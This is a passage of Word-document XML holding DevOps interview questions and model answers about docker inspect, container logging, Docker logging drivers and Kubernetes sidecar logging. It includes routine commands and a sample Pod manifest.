        <w:t>docker inspect -f '{{.Name}}'</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{.State.Pid}}'</w:t>
        <w:br/>
        <w:t>docker inspect -f '{{.HostConfig.NetworkMode}}'</w:t>
        <w:br/>
        <w:t>This helps extract specific information instead of reading the full JSON output.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World DevOps Usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Troubleshooting container issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Verifying port mappings</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Finding container IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Checking mounted volumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Validating environment variables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Debugging networking problems</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Auditing container configuration</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker inspect myapp | grep -i ipaddress</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker inspect</w:t>
        <w:br/>
        <w:t>vs</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker inspect</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic Container Info</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Detailed Configuration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network Details</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Volume Details</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full</w:t>
        <w:br/>
        <w:tab/>
        <w:t>JSON Output</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>docker inspect is a diagnostic command that provides detailed JSON-formatted metadata about Docker objects such as containers, images, networks, and volumes. It is commonly used to retrieve information like container state, IP addresses, environment variables, mounted volumes, port mappings, and runtime configurations. In production environments, docker inspect is an essential troubleshooting and auditing tool for validating container behavior and infrastructure configurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q383. What is container logging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Container Logging?</w:t>
        <w:br/>
        <w:t>Container logging is the process of collecting, storing, and analyzing logs generated by containers and the applications running inside them.</w:t>
        <w:br/>
        <w:t>Logs help with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Troubleshooting</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Auditing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security investigations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Performance analysis</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why is Container Logging Important?</w:t>
        <w:br/>
        <w:t>Containers are ephemeral:</w:t>
        <w:br/>
        <w:t>Container Starts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Generates Logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container Stops</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Logs Lost (if not collected)</w:t>
        <w:br/>
        <w:t>Therefore, logs should be stored outside the container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Logging Mechanism</w:t>
        <w:br/>
        <w:t>Docker captures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * STDOUT</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * STDERR</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>print("Application Started")</w:t>
        <w:br/>
        <w:t>Docker automatically captures this output.</w:t>
        <w:br/>
        <w:t>View logs:</w:t>
        <w:br/>
        <w:t>docker logs &lt;container_name&gt;</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker logs nginx-container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Follow Logs in Real Time</w:t>
        <w:br/>
        <w:t>docker logs -f nginx-container</w:t>
        <w:br/>
        <w:t>Similar to:</w:t>
        <w:br/>
        <w:t>tail -f logfile.log</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Log Drivers</w:t>
        <w:br/>
        <w:t>Docker uses logging drivers to determine where logs are stored.</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker inspect nginx-container</w:t>
        <w:br/>
        <w:t>Common log drivers:</w:t>
        <w:br/>
        <w:t>Driver</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>json-file</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default Docker logging</w:t>
        <w:br/>
        <w:tab/>
        <w:t>local</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Optimized local storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>syslog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Send logs to Syslog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>journald</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Linux systemd journal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>fluentd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Send to Fluentd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>gelf</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Send to Graylog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>awslogs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Send to CloudWatch</w:t>
        <w:br/>
        <w:tab/>
        <w:t>splunk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Send to Splunk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver=syslog \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Logs are sent directly to Syslog.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Centralized Logging Architecture</w:t>
        <w:br/>
        <w:t>Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Log Collector</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Central Logging Platform</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Search / Dashboard / Alerts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Logging Stack</w:t>
        <w:br/>
        <w:t>EFK Stack</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Elasticsearch</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fluentd</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kibana</w:t>
        <w:br/>
        <w:t>Container Logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Fluentd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Elasticsearch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Kibana Dashboard</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Alternative Logging Solutions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Splunk</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Graylog</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Grafana Loki</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Datadog</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Logging</w:t>
        <w:br/>
        <w:t>Best practice:</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>STDOUT / STDERR</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container Runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Node Log Files</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Log Aggregator</w:t>
        <w:br/>
        <w:t>View logs:</w:t>
        <w:br/>
        <w:t>kubectl logs pod-name</w:t>
        <w:br/>
        <w:t>Follow logs:</w:t>
        <w:br/>
        <w:t>kubectl logs -f pod-name</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Logging Best Practices</w:t>
        <w:br/>
        <w:t>✅ Log to STDOUT and STDERR</w:t>
        <w:br/>
        <w:t>✅ Avoid storing logs inside containers</w:t>
        <w:br/>
        <w:t>✅ Use centralized logging</w:t>
        <w:br/>
        <w:t>✅ Structure logs in JSON format</w:t>
        <w:br/>
        <w:t>✅ Implement log retention policies</w:t>
        <w:br/>
        <w:t>✅ Monitor for errors and anomalies</w:t>
        <w:br/>
        <w:t>✅ Correlate logs with metrics and traces</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example JSON Log</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "timestamp":"2026-05-30T10:00:00Z",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "level":"INFO",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "service":"payment-api",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "message":"Payment processed successfully"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Structured logs are easier to search and analyze.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Container logging is the practice of collecting and managing logs generated by containerized applications and runtimes. Docker captures application output written to STDOUT and STDERR, which can be viewed using commands such as docker logs. Since containers are ephemeral, production environments typically forward logs to centralized platforms like Elasticsearch, Splunk, Grafana Loki, or Datadog for storage, analysis, and alerting. A common best practice is to emit structured JSON logs to STDOUT and use centralized log aggregation to ensure observability, troubleshooting, compliance, and operational visibility across distributed containerized workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q384. Explain logging drivers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Docker Logging Drivers?</w:t>
        <w:br/>
        <w:t>Logging drivers are plugins/mechanisms used by Docker to determine where container logs are stored and how they are forwarded.</w:t>
        <w:br/>
        <w:t>When a container writes logs to STDOUT or STDERR, the logging driver captures and processes those logs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Logging Drivers Work</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>STDOUT / STDERR</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Docker Logging Driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Log Destination</w:t>
        <w:br/>
        <w:t>The logging driver decides the final destination of logs.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View Current Logging Driver</w:t>
        <w:br/>
        <w:t>docker info | grep "Logging Driver"</w:t>
        <w:br/>
        <w:t>Example output:</w:t>
        <w:br/>
        <w:t>Logging Driver: json-file</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check Logging Driver for a Container</w:t>
        <w:br/>
        <w:t>docker inspect nginx-container</w:t>
        <w:br/>
        <w:t>Look for:</w:t>
        <w:br/>
        <w:t>"LogConfig": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "Type": "json-file"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Docker Logging Drivers</w:t>
        <w:br/>
        <w:t>Driver</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>json-file</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default Docker logging driver</w:t>
        <w:br/>
        <w:tab/>
        <w:t>local</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Optimized local log storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>syslog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sends logs to Syslog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>journald</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sends logs to systemd journal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>fluentd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sends logs to Fluentd</w:t>
        <w:br/>
        <w:tab/>
        <w:t>gelf</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sends logs to Graylog</w:t>
        <w:br/>
        <w:tab/>
        <w:t>awslogs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sends logs to AWS CloudWatch</w:t>
        <w:br/>
        <w:tab/>
        <w:t>splunk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sends logs to Splunk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>none</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Disables logging</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. json-file (Default)</w:t>
        <w:br/>
        <w:t>Stores logs as JSON files on the host.</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Docker automatically stores logs locally.</w:t>
        <w:br/>
        <w:t>View:</w:t>
        <w:br/>
        <w:t>docker logs &lt;container&gt;</w:t>
        <w:br/>
        <w:t>Advantages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Simple</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Default configuration</w:t>
        <w:br/>
        <w:t>Disadvantages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Log files can grow large</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. local</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver local \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Better performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Built-in log rotation</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Less disk usage</w:t>
        <w:br/>
        <w:t>Preferred over json-file on many systems.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. syslog</w:t>
        <w:br/>
        <w:t>Send logs to a Syslog server.</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver syslog \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Architecture:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Syslog Server</w:t>
        <w:br/>
        <w:t>Useful for centralized logging.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. journald</w:t>
        <w:br/>
        <w:t>For Linux systems using systemd.</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver journald \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>View logs:</w:t>
        <w:br/>
        <w:t>journalctl -u docker</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. fluentd</w:t>
        <w:br/>
        <w:t>Send logs to Fluentd.</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver fluentd \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Architecture:</w:t>
        <w:br/>
        <w:t>Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Fluentd</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Elasticsearch / Splunk / S3</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. gelf</w:t>
        <w:br/>
        <w:t>Send logs to Graylog.</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver gelf \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Useful for enterprise log analytics.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. awslogs</w:t>
        <w:br/>
        <w:t>Send logs directly to  Amazon CloudWatch Logs.</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver awslogs \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Common in AWS environments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. splunk</w:t>
        <w:br/>
        <w:t>Send logs directly to  Splunk.</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver splunk \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Used in enterprise monitoring and SIEM solutions.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Configure Logging Driver</w:t>
        <w:br/>
        <w:t>Per container:</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>--log-driver json-file \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>Global configuration (daemon.json):</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "log-driver": "local"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>Restart Docker:</w:t>
        <w:br/>
        <w:t>systemctl restart docker</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Logging Driver Best Practices</w:t>
        <w:br/>
        <w:t>✅ Use local or json-file for development</w:t>
        <w:br/>
        <w:t>✅ Use centralized logging in production</w:t>
        <w:br/>
        <w:t>✅ Configure log rotation</w:t>
        <w:br/>
        <w:t>✅ Use structured JSON logs</w:t>
        <w:br/>
        <w:t>✅ Avoid storing logs only on container hosts</w:t>
        <w:br/>
        <w:t>✅ Monitor log storage growth</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker logging drivers determine how container logs are captured, stored, and forwarded. Docker collects logs written to STDOUT and STDERR and passes them to the configured logging driver. Common drivers include json-file for local storage, local for optimized local logging, syslog, journald, fluentd, gelf, awslogs, and splunk for centralized log aggregation. In production environments, logging drivers are typically integrated with centralized logging platforms to support monitoring, troubleshooting, auditing, and compliance requirements across containerized workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q385. What is sidecar logging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Sidecar Logging?</w:t>
        <w:br/>
        <w:t>Sidecar logging is a logging pattern where a separate container (called a sidecar container) runs alongside the main application container in the same Pod and is responsible for collecting, processing, and forwarding logs.</w:t>
        <w:br/>
        <w:t>This pattern is commonly used in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Pod</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>├── Application Container</w:t>
        <w:br/>
        <w:t>│      │</w:t>
        <w:br/>
        <w:t>│      ▼</w:t>
        <w:br/>
        <w:t>│   Writes Logs</w:t>
        <w:br/>
        <w:t>│</w:t>
        <w:br/>
        <w:t>└── Logging Sidecar</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Collects Logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Elasticsearch / Splunk / Loki</w:t>
        <w:br/>
        <w:t>Both containers share the same Pod and can access shared storage.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Sidecar Logging?</w:t>
        <w:br/>
        <w:t>Some legacy applications:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Write logs to files instead of STDOUT</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cannot be modified easily</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Require custom log processing</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>/app/logs/application.log</w:t>
        <w:br/>
        <w:t>A sidecar container reads this file and ships the logs to a centralized logging system.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Application Container</w:t>
        <w:br/>
        <w:t>/app/logs/app.log</w:t>
        <w:br/>
        <w:t>Writes logs continuously.</w:t>
        <w:br/>
        <w:t>Sidecar Container</w:t>
        <w:br/>
        <w:t>Runs:</w:t>
        <w:br/>
        <w:t>tail -F /app/logs/app.log</w:t>
        <w:br/>
        <w:t>and forwards logs to a logging platform.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Example</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-pod</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">    emptyDir: {}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: myapp</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      mountPath: /logs</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  - name: log-sidecar</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: busybox</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command: ["sh","-c","tail -F /logs/app.log"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - name: logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      mountPath: /logs</w:t>
        <w:br/>
        <w:t>Shared volume:</w:t>
        <w:br/>
        <w:t>emptyDir</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌──┴──┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼     ▼</w:t>
        <w:br/>
        <w:t>App   Sidecar</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Sidecar Logging Agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fluent Bit</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Fluentd</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vector</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Logstash</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Sidecar Logging Flow</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Log File</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Sidecar Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Log Aggregator</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Dashboard / Alerts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>✅ Works with applications that write to files</w:t>
        <w:br/>
        <w:t>✅ No application code changes required</w:t>
        <w:br/>
        <w:t>✅ Independent log processing</w:t>
        <w:br/>
        <w:t>✅ Supports custom parsing and filtering</w:t>
        <w:br/>
        <w:t>✅ Easy integration with centralized logging systems</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Disadvantages</w:t>
        <w:br/>
        <w:t>❌ Additional container per Pod</w:t>
        <w:br/>
        <w:t>❌ Higher CPU and memory usage</w:t>
        <w:br/>
        <w:t>❌ More operational complexity</w:t>
